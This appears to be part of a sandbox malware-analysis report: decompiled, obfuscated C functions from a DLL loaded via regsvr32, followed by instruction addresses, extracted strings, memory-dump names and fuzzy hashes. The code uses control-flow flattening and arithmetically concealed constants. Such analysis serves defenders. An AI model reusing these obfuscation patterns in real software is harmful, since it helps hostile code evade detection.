				_v100 = _v100 << 0x10;
				_v100 = _v100 ^ 0x393fffdd;
				_v52 = 0x39bbec;
				_v52 = _v52 + 0x24d1;
				_v52 = _v52 | 0xabf18b49;
				_v52 = _v52 ^ 0xabf4ec61;
				_v88 = 0x5f524e;
				_v88 = _v88 | 0x1d75b174;
				_t242 = 0x7a;
				_v88 = _v88 / _t242;
				_v88 = _v88 ^ 0x0032d551;
				_v88 = _v88 ^ 0x0004d3b3;
				_v92 = 0xd08c0e;
				_v92 = _v92 | 0x7ffddb6b;
				_v92 = _v92 ^ 0x565af3e4;
				_v92 = _v92 ^ 0x29a06c5a;
				_v96 = 0x219914;
				_t243 = 0x39;
				_v96 = _v96 * 0x3c;
				_v96 = _v96 + 0xffff9327;
				_v96 = _v96 | 0x1157f4a4;
				_v96 = _v96 ^ 0x17d48774;
				_v8 = 0x6a4663;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x00d38b82;
				_v12 = 0xdb0508;
				_v12 = _v12 + 0x8da;
				_v12 = _v12 ^ 0x00d93669;
				_v80 = 0x715cda;
				_v80 = _v80 | 0xdfbed080;
				_v80 = _v80 >> 5;
				_v80 = _v80 << 8;
				_v80 = _v80 ^ 0xfff720e0;
				_v84 = 0x2de733;
				_v84 = _v84 / _t243;
				_v84 = _v84 << 3;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x006e58e1;
				_v16 = 0x442937;
				_v16 = _v16 * 0x34;
				_v16 = _v16 ^ 0x0dd065ff;
				_v4 = 0x40adf7;
				_v4 = _v4 + 0xffffe3bd;
				_v4 = _v4 ^ 0x0049bbba;
				_v72 = 0x7f3600;
				_v72 = _v72 >> 4;
				_v72 = _v72 >> 6;
				_v72 = _v72 | 0x12c2ae34;
				_v72 = _v72 ^ 0x12cf4e27;
				_v76 = 0x4f8b66;
				_v76 = _v76 | 0xd538ce0d;
				_v76 = _v76 ^ 0xd40bc508;
				_v76 = _v76 ^ 0x11d7c146;
				_v76 = _v76 ^ 0x10a2ef9b;
				while(1) {
					L1:
					_t233 = 0x50918d2;
					do {
						L2:
						while(_t262 != 0x3de9b9f) {
							if(_t262 == _t233) {
								_push(_t243);
								_push(_t243);
								_t243 = _v8;
								_t234 = E1001AA59(_t243, _t261, _v44, _v12, E100088E5, _v48, _v80, _v84, _v16);
								_t265 =  &(_t265[9]);
								 *((intOrPtr*)(_t261 + 8)) = _t234;
								__eflags = _t234;
								if(__eflags == 0) {
									_t262 = 0xefebf54;
									goto L1;
								}
							} else {
								if(_t262 == 0x55899f7) {
									_t243 = _v52;
									_t235 = E10010F57(_t243, _v88, _v92,  *((intOrPtr*)(_t261 + 0x24)), _v96);
									_t265 =  &(_t265[3]);
									 *((intOrPtr*)(_t261 + 0x1c)) = _t235;
									__eflags = _t235;
									_t233 = 0x50918d2;
									_t262 =  !=  ? 0x50918d2 : 0xefebf54;
									continue;
								} else {
									if(_t262 == 0x76718d4) {
										_t234 = E10003C51(_v32, __eflags, _v68, _v36, _v40, _t239);
										_t266 =  &(_t265[4]);
										 *((intOrPtr*)(_t261 + 0x24)) = _t234;
										__eflags = _t234;
										if(_t234 != 0) {
											E10021872( *((intOrPtr*)(_t261 + 0x24)), _v104, _v60,  *((intOrPtr*)(_t261 + 0x24)), _v28, _v64);
											_t243 = _v20;
											E10010E0B( *((intOrPtr*)(_t261 + 0x24)), _v24, _v56, _v100);
											_t265 =  &(_t266[7]);
											_t262 = 0x55899f7;
											while(1) {
												L1:
												_t233 = 0x50918d2;
												goto L2;
											}
										}
									} else {
										if(_t262 == 0xefebf54) {
											return E10010F7A(_v4, _v72, _v76,  *((intOrPtr*)(_t261 + 0x24)));
										}
										goto L15;
									}
								}
							}
							return _t234;
						}
						_t262 = 0x76718d4;
						L15:
						__eflags = _t262 - 0x6f21388;
					} while (__eflags != 0);
					return _t233;
				}
			}

0x1000ced8
0x1000cedb
0x1000cee3
0x1000cef3
0x1000cef5
0x1000cefb
0x1000cf00
0x1000cf05
0x1000cf0b
0x1000cf13
0x1000cf1b
0x1000cf23
0x1000cf2b
0x1000cf33
0x1000cf3b
0x1000cf43
0x1000cf4b
0x1000cf53
0x1000cf57
0x1000cf5f
0x1000cf67
0x1000cf6f
0x1000cf77
0x1000cf7f
0x1000cf87
0x1000cf8f
0x1000cf97
0x1000cf9f
0x1000cfa3
0x1000cfab
0x1000cfb3
0x1000cfbb
0x1000cfc3
0x1000cfc7
0x1000cfcf
0x1000cfd7
0x1000cfdf
0x1000cfe7
0x1000cfef
0x1000cff7
0x1000cfff
0x1000d007
0x1000d00f
0x1000d017
0x1000d01c
0x1000d024
0x1000d02c
0x1000d034
0x1000d03c
0x1000d044
0x1000d049
0x1000d051
0x1000d059
0x1000d061
0x1000d066
0x1000d06e
0x1000d073
0x1000d07b
0x1000d083
0x1000d08b
0x1000d093
0x1000d09b
0x1000d0a3
0x1000d0af
0x1000d0b2
0x1000d0b6
0x1000d0be
0x1000d0c6
0x1000d0ce
0x1000d0d6
0x1000d0de
0x1000d0e8
0x1000d0fc
0x1000d0fd
0x1000d101
0x1000d109
0x1000d111
0x1000d119
0x1000d121
0x1000d125
0x1000d12d
0x1000d135
0x1000d13d
0x1000d145
0x1000d14d
0x1000d155
0x1000d15a
0x1000d15f
0x1000d167
0x1000d175
0x1000d179
0x1000d17e
0x1000d183
0x1000d18b
0x1000d198
0x1000d19c
0x1000d1a4
0x1000d1ac
0x1000d1b4
0x1000d1bc
0x1000d1c4
0x1000d1c9
0x1000d1ce
0x1000d1d6
0x1000d1de
0x1000d1e6
0x1000d1ee
0x1000d1f6
0x1000d1fe
0x1000d206
0x1000d206
0x1000d206
0x1000d20b
0x00000000
0x1000d20b
0x1000d219
0x1000d2eb
0x1000d2ec
0x1000d30f
0x1000d316
0x1000d31b
0x1000d31e
0x1000d321
0x1000d323
0x1000d329
0x00000000
0x1000d329
0x1000d21f
0x1000d225
0x1000d2cb
0x1000d2cf
0x1000d2d4
0x1000d2d7
0x1000d2da
0x1000d2de
0x1000d2e3
0x00000000
0x1000d22b
0x1000d231
0x1000d26a
0x1000d26f
0x1000d272
0x1000d275
0x1000d277
0x1000d28f
0x1000d2a3
0x1000d2aa
0x1000d2af
0x1000d2b2
0x1000d206
0x1000d206
0x1000d206
0x00000000
0x1000d206
0x1000d206
0x1000d233
0x1000d235
0x00000000
0x1000d250
0x00000000
0x1000d235
0x1000d231
0x1000d225
0x1000d258
0x1000d258
0x1000d330
0x1000d335
0x1000d335
0x1000d335
0x00000000
0x1000d20b

Strings

XdT, xrefs: 1000CF67
cFj, xrefs: 1000D119
#8, xrefs: 1000CF13
Xn, xrefs: 1000D183
7)D, xrefs: 1000D18B
47?v, xrefs: 1000CF57

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #8$47?v$7)D$XdT$cFj$Xn
API String ID: 0-3696559055
Opcode ID: 18657ed2bc5d9615e9c6c59b87783c7eb1bdf891289ddeece86ff61cf7071f80
Instruction ID: d5b0aba1783128eef5800c825e90d87573bf4a54badfac1999731a2f38b6bdce
Opcode Fuzzy Hash: 18657ed2bc5d9615e9c6c59b87783c7eb1bdf891289ddeece86ff61cf7071f80
Instruction Fuzzy Hash: 9DB11E724083819FD769CE21C58A40BFBF1FB84788F508A1DF59A92264D7B1DA58CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10019184 Relevance: 7.7, Strings: 6, Instructions: 213
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E10019184(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v12;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t173;
				signed int _t184;
				char* _t186;
				signed int _t187;
				void* _t189;
				void* _t192;
				signed int _t194;
				intOrPtr _t197;
				intOrPtr* _t202;
				void* _t204;
				intOrPtr _t205;
				intOrPtr* _t234;
				void* _t235;
				signed int _t237;
				signed int _t238;
				void* _t240;
				void* _t241;

				_push(_a12);
				_t234 = __edx;
				_t202 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t173);
				_v68 = 0xca63e3;
				_t241 = _t240 + 0x14;
				_v68 = _v68 + 0xffffcfc3;
				_v68 = _v68 ^ 0x00ca33a6;
				_t235 = 0;
				_v92 = 0x17d63a;
				_t204 = 0xf6b1333;
				_v92 = _v92 | 0xab997637;
				_t237 = 0x30;
				_v92 = _v92 * 0x63;
				_v92 = _v92 ^ 0xe73b361f;
				_v92 = _v92 ^ 0xb9e70c52;
				_v72 = 0xed709b;
				_v72 = _v72 ^ 0x84c67eb3;
				_v72 = _v72 ^ 0x8428e547;
				_v96 = 0xf385ff;
				_v96 = _v96 | 0x9bbdff7c;
				_v96 = _v96 + 0x4757;
				_v96 = _v96 ^ 0x9c01bc3f;
				_v76 = 0x5f042a;
				_v76 = _v76 | 0x2423713a;
				_v76 = _v76 ^ 0x24726572;
				_v100 = 0xb9402a;
				_v100 = _v100 / _t237;
				_t238 = 0x6a;
				_v100 = _v100 * 0x11;
				_v100 = _v100 + 0x3c5b;
				_v100 = _v100 ^ 0x0044411e;
				_v84 = 0x7d317e;
				_v84 = _v84 | 0x69360c41;
				_v84 = _v84 ^ 0x69716b1c;
				_v124 = 0x1871d9;
				_v124 = _v124 ^ 0x0d567c32;
				_v124 = _v124 ^ 0x73e8392d;
				_v124 = _v124 ^ 0x86c1e434;
				_v124 = _v124 ^ 0xf863d1ee;
				_v116 = 0x415b96;
				_v116 = _v116 + 0xfe6e;
				_v116 = _v116 + 0x1e39;
				_v116 = _v116 / _t238;
				_v116 = _v116 ^ 0x000fd94c;
				_v120 = 0xd297cf;
				_v120 = _v120 << 3;
				_v120 = _v120 >> 8;
				_v120 = _v120 + 0x4be4;
				_v120 = _v120 ^ 0x0008c90e;
				_v80 = 0x94e557;
				_v80 = _v80 * 0x55;
				_v80 = _v80 ^ 0x31772ab6;
				_v112 = 0xe50e8a;
				_v112 = _v112 | 0xa2f705f4;
				_v112 = _v112 >> 4;
				_v112 = _v112 + 0xffffd453;
				_v112 = _v112 ^ 0x0a2f3884;
				_v88 = 0x6ba69d;
				_v88 = _v88 + 0xffffa6e1;
				_v88 = _v88 ^ 0xbb94a2d0;
				_v88 = _v88 ^ 0xbbfdfa67;
				_v104 = 0x6c171c;
				_v104 = _v104 << 9;
				_v104 = _v104 >> 3;
				_v104 = _v104 * 0x35;
				_v104 = _v104 ^ 0x983de2fe;
				_v108 = 0xb13737;
				_v108 = _v108 << 0xb;
				_v108 = _v108 + 0xffff64c7;
				_v108 = _v108 | 0xa8f93bfe;
				_v108 = _v108 ^ 0xa9fb490c;
				_v60 = 0xaad708;
				_v60 = _v60 << 8;
				_v60 = _v60 ^ 0xaadf805d;
				_v64 = 0x6effbd;
				_v64 = _v64 * 0x30;
				_v64 = _v64 ^ 0x14c870ea;
				do {
					while(_t204 != 0x287a6fd) {
						if(_t204 == 0xab4a2c0) {
							_t153 =  &_v76; // 0x24726572
							_t189 = E10009617(_v72,  &_v48, _v96,  &_v56,  *_t153, _v100);
							_t241 = _t241 + 0x10;
							if(_t189 == 0) {
								L26:
								return _t235;
							}
							_t204 = 0xf74e443;
							continue;
						}
						if(_t204 == 0xb5603ad) {
							E10006A8D(_v60, _v64, _v48);
							goto L26;
						}
						if(_t204 == 0xf23355d) {
							_t192 = E100116AD( &_v12,  &_v36, _v116, _v120);
							_pop(_t212);
							if(_t192 != 0) {
								_t197 = E1001EAA3(_v32);
								 *_t234 = _t197;
								if(_t197 != 0) {
									E10011D1C(_v32, _v88, _v104, _v108, _t197, _v36);
									_t241 = _t241 + 0x10;
									 *((intOrPtr*)(_t234 + 4)) = _v32;
									_t235 = 1;
								}
							}
							_t204 = 0xb5603ad;
							continue;
						}
						if(_t204 == 0xf6b1333) {
							_t204 = 0x287a6fd;
							continue;
						}
						if(_t204 != 0xf74e443) {
							goto L23;
						}
						_t194 = E1001F060(_v84,  &_v40,  &_v48, _v124);
						asm("sbb ecx, ecx");
						_t204 = ( ~_t194 & 0x03cd31b0) + 0xb5603ad;
					}
					_t184 =  *((intOrPtr*)(_t202 + 4));
					_t205 =  *_t202;
					_v52 = _t184;
					_v56 = _t205;
					_t186 = _t184 - 1 + _t205;
					while(_t186 > _t205) {
						if( *_t186 == 0) {
							break;
						}
						_t186 = _t186 - 1;
					}
					_t187 = _t186 - _t205;
					_v52 = _t187;
					if(_t187 == 0) {
						L22:
						_t204 = 0xab4a2c0;
						goto L23;
					}
					while(_v52 % _v92 != _v68) {
						_t168 =  &_v52;
						 *_t168 = _v52 - 1;
						if( *_t168 != 0) {
							continue;
						}
						goto L22;
					}
					goto L22;
					L23:
				} while (_t204 != 0xcb37afc);
				goto L26;
			}

0x1001918e
0x10019195
0x10019197
0x10019199
0x100191a0
0x100191a7
0x100191a8
0x100191a9
0x100191ae
0x100191b6
0x100191b9
0x100191c3
0x100191cb
0x100191cd
0x100191d5
0x100191da
0x100191e9
0x100191ec
0x100191f0
0x100191f8
0x10019200
0x10019208
0x10019210
0x10019218
0x10019220
0x10019228
0x10019230
0x10019238
0x10019240
0x10019248
0x10019250
0x10019260
0x10019269
0x1001926a
0x1001926e
0x10019276
0x1001927e
0x10019286
0x1001928e
0x10019296
0x1001929e
0x100192a6
0x100192ae
0x100192b6
0x100192be
0x100192c6
0x100192ce
0x100192dc
0x100192e0
0x100192e8
0x100192f0
0x100192f5
0x100192fa
0x10019302
0x1001930a
0x10019317
0x1001931b
0x10019323
0x1001932b
0x10019333
0x10019338
0x10019340
0x10019348
0x10019350
0x10019358
0x10019360
0x10019368
0x10019375
0x1001937a
0x10019384
0x10019388
0x10019390
0x10019398
0x1001939d
0x100193a5
0x100193ad
0x100193b5
0x100193bd
0x100193c2
0x100193ca
0x100193d7
0x100193db
0x100193e3
0x100193e3
0x100193f5
0x100194c1
0x100194d2
0x100194d7
0x100194dc
0x1001954a
0x10019555
0x10019555
0x100194de
0x00000000
0x100194de
0x100193fd
0x10019543
0x00000000
0x10019548
0x10019409
0x10019461
0x10019467
0x1001946a
0x10019479
0x1001947e
0x10019483
0x1001949d
0x100194ab
0x100194ae
0x100194b1
0x100194b1
0x10019483
0x100194b2
0x00000000
0x100194b2
0x10019411
0x10019447
0x00000000
0x10019447
0x10019419
0x00000000
0x00000000
0x10019430
0x1001943b
0x10019443
0x10019443
0x100194e8
0x100194eb
0x100194ed
0x100194f2
0x100194f6
0x10019500
0x100194fd
0x00000000
0x00000000
0x100194ff
0x100194ff
0x10019504
0x10019506
0x1001950a
0x10019524
0x10019524
0x00000000
0x10019524
0x1001950c
0x1001951e
0x1001951e
0x10019522
0x00000000
0x00000000
0x00000000
0x10019522
0x00000000
0x10019529
0x10019529
0x00000000

Strings

-9s, xrefs: 100192A6
~1}, xrefs: 1001927E
rer$, xrefs: 100194C1
K, xrefs: 100192FA
[<, xrefs: 1001926E
WG, xrefs: 10019228

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -9s$WG$[<$rer$$~1}$K
API String ID: 0-110663538
Opcode ID: ff6576ca8f7abbd3c1e610d3631226a804989d083e836f480d54680c89154414
Instruction ID: 5273319e2874da3676d812ec7d9650b999276242de4fb70ad0c2a781b9a2f9bd
Opcode Fuzzy Hash: ff6576ca8f7abbd3c1e610d3631226a804989d083e836f480d54680c89154414
Instruction Fuzzy Hash: 30A14FB10083819BD398CF25C48691BFBE1FBC4788F10891DF1969A260D7B5DA89CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001C16B Relevance: 7.7, Strings: 6, Instructions: 208
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E1001C16B() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				intOrPtr _t180;
				signed int _t184;
				char _t186;
				intOrPtr _t190;
				intOrPtr _t191;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				intOrPtr _t209;
				void* _t227;
				char _t231;
				void* _t232;
				void* _t234;

				_v20 = 0xa07b99;
				_v16 = 0x5273ec;
				_t191 = 0;
				_v12 = 0;
				_v8 = 0;
				_v64 = 0x220233;
				_v64 = _v64 | 0xdf9f6ddf;
				_v64 = _v64 ^ 0xdfbe0a38;
				_v92 = 0xd2b45;
				_v92 = _v92 << 4;
				_v92 = _v92 + 0x8147;
				_v92 = _v92 + 0xd87a;
				_v92 = _v92 ^ 0x00d83b30;
				_v96 = 0x57dbc3;
				_v96 = _v96 | 0xfbcc9489;
				_v96 = _v96 * 0x71;
				_t227 = 0x542318b;
				_t193 = 0x16;
				_v96 = _v96 * 0x64;
				_v96 = _v96 ^ 0xe5fa8168;
				_v100 = 0x3faca7;
				_v100 = _v100 + 0x6e7d;
				_v100 = _v100 + 0x84ad;
				_v100 = _v100 / _t193;
				_v100 = _v100 ^ 0x00092674;
				_v68 = 0x2c21c2;
				_v68 = _v68 << 8;
				_v68 = _v68 + 0xffff61c7;
				_v68 = _v68 ^ 0x2c20c9fd;
				_v72 = 0xb1d25b;
				_v72 = _v72 | 0xc195770f;
				_v72 = _v72 + 0xffff4fc0;
				_v72 = _v72 ^ 0xc1bad1b3;
				_v104 = 0x508d51;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0x1064e6ab;
				_v104 = _v104 + 0xffffd8a9;
				_v104 = _v104 ^ 0x15671c79;
				_v76 = 0xeb10ba;
				_t194 = 0x3b;
				_v76 = _v76 / _t194;
				_v76 = _v76 + 0xffff80c9;
				_v76 = _v76 ^ 0x000f02e0;
				_v48 = 0x421d4c;
				_v48 = _v48 << 6;
				_v48 = _v48 ^ 0x108d40a4;
				_v88 = 0x10f3e9;
				_v88 = _v88 + 0xb951;
				_t195 = 0x2d;
				_v88 = _v88 / _t195;
				_v88 = _v88 | 0x79b3dc0d;
				_v88 = _v88 ^ 0x79b57b5b;
				_v60 = 0xc3cbc8;
				_v60 = _v60 + 0xb647;
				_v60 = _v60 * 0x6a;
				_v60 = _v60 ^ 0x5159e64c;
				_v84 = 0xe89bca;
				_v84 = _v84 | 0x2fcf67f5;
				_v84 = _v84 ^ 0x5b0989c8;
				_v84 = _v84 ^ 0x74e85633;
				_v52 = 0xbcebdf;
				_t196 = 0x4f;
				_v52 = _v52 / _t196;
				_v52 = _v52 ^ 0x59631260;
				_v52 = _v52 ^ 0x596b7bb3;
				_v56 = 0x9ce7ae;
				_v56 = _v56 + 0xffff1033;
				_v56 = _v56 * 3;
				_v56 = _v56 ^ 0x01d557ac;
				_v80 = 0x5d782f;
				_v80 = _v80 + 0xffff2a96;
				_v80 = _v80 << 1;
				_v80 = _v80 << 6;
				_v80 = _v80 ^ 0x2e5950f8;
				_t231 = _v44;
				_t226 = _v44;
				goto L1;
				do {
					while(1) {
						L1:
						_t234 = _t227 - 0x542318b;
						if(_t234 > 0) {
							break;
						}
						if(_t234 == 0) {
							_t227 = 0x781809f;
							continue;
						}
						if(_t227 == 0x5a06ea) {
							_t227 = 0x1a75ef0;
							if(_v44 > 3) {
								_t186 = E10010097(_v72,  &_v36,  *((intOrPtr*)(_t226 + 0xc)));
								_v40 = _t186;
								if(_t186 != 0) {
									_t227 = 0x4591863;
								}
							}
							continue;
						}
						if(_t227 == 0xd128ef) {
							_t180 = E10015CB1(_v92, _t231, _v96,  &_v44, _v100);
							_t226 = _t180;
							_t232 = _t232 + 0xc;
							if(_t180 == 0) {
								L23:
								return _t191;
							}
							_t227 = 0x5a06ea;
							continue;
						}
						if(_t227 == 0x1a75ef0) {
							E1000F9A7(_t226, _v52, _v56, _v80);
							goto L23;
						}
						if(_t227 != 0x4591863) {
							goto L20;
						} else {
							_t184 = E10007599( &_v40, _v104, _v76,  &_v32);
							asm("sbb esi, esi");
							_t227 = ( ~_t184 & 0x06125a3e) + 0x60ddf1d;
							continue;
						}
					}
					if(_t227 == 0x60ddf1d) {
						E10006A8D(_v60, _v84, _v40);
						_t227 = 0x1a75ef0;
						goto L20;
					}
					if(_t227 == 0x781809f) {
						_t231 = E1000E2B2();
						_t227 = 0xd128ef;
						goto L1;
					}
					if(_t227 != 0xc20395b) {
						goto L20;
					}
					_t209 =  *0x10024208; // 0x49d848
					_t154 = _t209 + 0x210; // 0x760042
					E1000F605(_t154, _v48, _v88, _v28, _v24 + 1);
					_t190 =  *0x10024208; // 0x49d848
					_t232 = _t232 + 0xc;
					_t191 = 1;
					_t227 = 0x60ddf1d;
					 *((intOrPtr*)(_t190 + 0x43c)) = _v32;
					goto L1;
					L20:
				} while (_t227 != 0x3838257);
				goto L23;
			}

0x1001c16e
0x1001c178
0x1001c181
0x1001c183
0x1001c187
0x1001c18b
0x1001c193
0x1001c19b
0x1001c1a3
0x1001c1ab
0x1001c1b0
0x1001c1b8
0x1001c1c0
0x1001c1c8
0x1001c1d0
0x1001c1e2
0x1001c1e6
0x1001c1f0
0x1001c1f3
0x1001c1f7
0x1001c1ff
0x1001c207
0x1001c20f
0x1001c21f
0x1001c223
0x1001c22b
0x1001c233
0x1001c238
0x1001c240
0x1001c248
0x1001c250
0x1001c258
0x1001c260
0x1001c268
0x1001c270
0x1001c275
0x1001c27d
0x1001c285
0x1001c28d
0x1001c299
0x1001c29e
0x1001c2a4
0x1001c2ac
0x1001c2b4
0x1001c2bc
0x1001c2c1
0x1001c2c9
0x1001c2d1
0x1001c2dd
0x1001c2e0
0x1001c2e4
0x1001c2ec
0x1001c2f4
0x1001c2fc
0x1001c309
0x1001c30d
0x1001c315
0x1001c31d
0x1001c325
0x1001c32d
0x1001c335
0x1001c345
0x1001c348
0x1001c34c
0x1001c354
0x1001c35c
0x1001c364
0x1001c371
0x1001c375
0x1001c37d
0x1001c385
0x1001c38d
0x1001c391
0x1001c396
0x1001c39e
0x1001c3a2
0x1001c3a2
0x1001c3a6
0x1001c3a6
0x1001c3a6
0x1001c3a6
0x1001c3ac
0x00000000
0x00000000
0x1001c3b2
0x1001c478
0x00000000
0x1001c478
0x1001c3be
0x1001c440
0x1001c445
0x1001c45b
0x1001c460
0x1001c468
0x1001c46e
0x1001c46e
0x1001c468
0x00000000
0x1001c445
0x1001c3c6
0x1001c41f
0x1001c424
0x1001c426
0x1001c42b
0x1001c52e
0x1001c534
0x1001c534
0x1001c431
0x00000000
0x1001c431
0x1001c3ce
0x1001c524
0x00000000
0x1001c52a
0x1001c3da
0x00000000
0x1001c3e0
0x1001c3f1
0x1001c3fb
0x1001c404
0x00000000
0x1001c404
0x1001c3da
0x1001c488
0x1001c4fd
0x1001c503
0x00000000
0x1001c503
0x1001c490
0x1001c4e5
0x1001c4e7
0x00000000
0x1001c4e7
0x1001c498
0x00000000
0x00000000
0x1001c4a8
0x1001c4b2
0x1001c4b8
0x1001c4bd
0x1001c4c8
0x1001c4cb
0x1001c4cc
0x1001c4d1
0x00000000
0x1001c508
0x1001c508
0x00000000

Strings

E+, xrefs: 1001C1A3
3Vt, xrefs: 1001C32D
LYQ, xrefs: 1001C30D
sR, xrefs: 1001C178
t&, xrefs: 1001C223
/x], xrefs: 1001C37D

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /x]$3Vt$E+$LYQ$t&$sR
API String ID: 0-93619843
Opcode ID: 85931b4fbc20adf24223fe72da287f722b7be20add9049c6ccb6e0c85937cfdf
Instruction ID: eaf4c2922b024f0b10ee5c02f98da4a796c925513b33aa0a80d445f2c81dfee8
Opcode Fuzzy Hash: 85931b4fbc20adf24223fe72da287f722b7be20add9049c6ccb6e0c85937cfdf
Instruction Fuzzy Hash: 969132728083459FC344CF65D48581BFBF1FBC4768F508A2DF499AA260D7B1DA898F86

Uniqueness

Uniqueness Score: -1.00%

Function 1000BB23 Relevance: 7.6, Strings: 6, Instructions: 129
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1000BB23(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t143;
				void* _t147;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t167;
				intOrPtr _t168;
				void* _t169;

				_t167 =  *0x1002507c;
				_v48 = 0x2df617;
				_t147 = __ecx;
				_v48 = _v48 + 0xffff48f2;
				_v48 = _v48 ^ 0x002d3f09;
				_v12 = 0xdfe900;
				_t149 = 0x73;
				_v12 = _v12 * 0x34;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xffff7410;
				_v12 = _v12 ^ 0x05a7b0e4;
				_v36 = 0x6e0b6b;
				_v36 = _v36 + 0x9c04;
				_v36 = _v36 / _t149;
				_v36 = _v36 ^ 0x00092922;
				_v44 = 0x3c4449;
				_v44 = _v44 | 0x386cda13;
				_v44 = _v44 ^ 0x387b611c;
				_v8 = 0x45ac57;
				_v8 = _v8 << 8;
				_v8 = _v8 + 0xffffceb4;
				_t150 = 0x72;
				_v8 = _v8 * 0x36;
				_v8 = _v8 ^ 0xb24e5b8f;
				_v40 = 0x2d3826;
				_v40 = _v40 << 8;
				_v40 = _v40 + 0x17fe;
				_v40 = _v40 ^ 0x2d314833;
				_v16 = 0xdce2a4;
				_v16 = _v16 << 5;
				_v16 = _v16 / _t150;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00077c5e;
				_v52 = 0xa55029;
				_v52 = _v52 + 0xffff52fb;
				_v52 = _v52 ^ 0x00a31a37;
				_v28 = 0x521883;
				_v28 = _v28 + 0xffff03c9;
				_v28 = _v28 + 0x7304;
				_t151 = 0x2f;
				_v28 = _v28 / _t151;
				_v28 = _v28 ^ 0x000e7901;
				_v24 = 0xa43006;
				_v24 = _v24 + 0x5de6;
				_v24 = _v24 + 0x554;
				_v24 = _v24 | 0x12407888;
				_v24 = _v24 ^ 0x12e78767;
				_v20 = 0xb1e366;
				_v20 = _v20 ^ 0xfb0bff08;
				_v20 = _v20 * 0x34;
				_v20 = _v20 + 0xc455;
				_v20 = _v20 ^ 0x21ca7630;
				_v32 = 0x684624;
				_v32 = _v32 + 0xffffc986;
				_v32 = _v32 * 0x36;
				_v32 = _v32 + 0xffff6fb0;
				_v32 = _v32 ^ 0x15fc4673;
				_v56 = 0xeff7ff;
				_v56 = _v56 * 0x39;
				_v56 = _v56 ^ 0x35681a0c;
				while(1) {
					_t168 =  *_t167;
					if(_t168 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t168 + 0x24)) == 0) {
						L4:
						 *_t167 =  *((intOrPtr*)(_t168 + 4));
						_t143 = E10006A8D(_v32, _v56, _t168);
					} else {
						_t143 = E10004CB9( *((intOrPtr*)(_t168 + 8)), _v12, _v36, _v44, _t147, _v8);
						_t169 = _t169 + 0x10;
						if(_t143 != _v48) {
							_t167 = _t168 + 4;
						} else {
							 *((intOrPtr*)(_t168 + 0x1c))( *((intOrPtr*)(_t168 + 0x24)), 0, 0);
							E10010F7A(_v40, _v16, _v52,  *((intOrPtr*)(_t168 + 0x24)));
							E1001E373(_v28,  *((intOrPtr*)(_t168 + 8)), _v24, _v20);
							_t169 = _t169 + 0x10;
							goto L4;
						}
					}
				}
				return _t143;
			}

0x1000bb2c
0x1000bb34
0x1000bb3b
0x1000bb3d
0x1000bb44
0x1000bb4b
0x1000bb58
0x1000bb5b
0x1000bb5e
0x1000bb62
0x1000bb69
0x1000bb70
0x1000bb77
0x1000bb85
0x1000bb88
0x1000bb8f
0x1000bb96
0x1000bb9d
0x1000bba4
0x1000bbab
0x1000bbaf
0x1000bbba
0x1000bbbd
0x1000bbc0
0x1000bbc7
0x1000bbce
0x1000bbd2
0x1000bbd9
0x1000bbe0
0x1000bbe7
0x1000bbf2
0x1000bbf5
0x1000bbf9
0x1000bc00
0x1000bc07
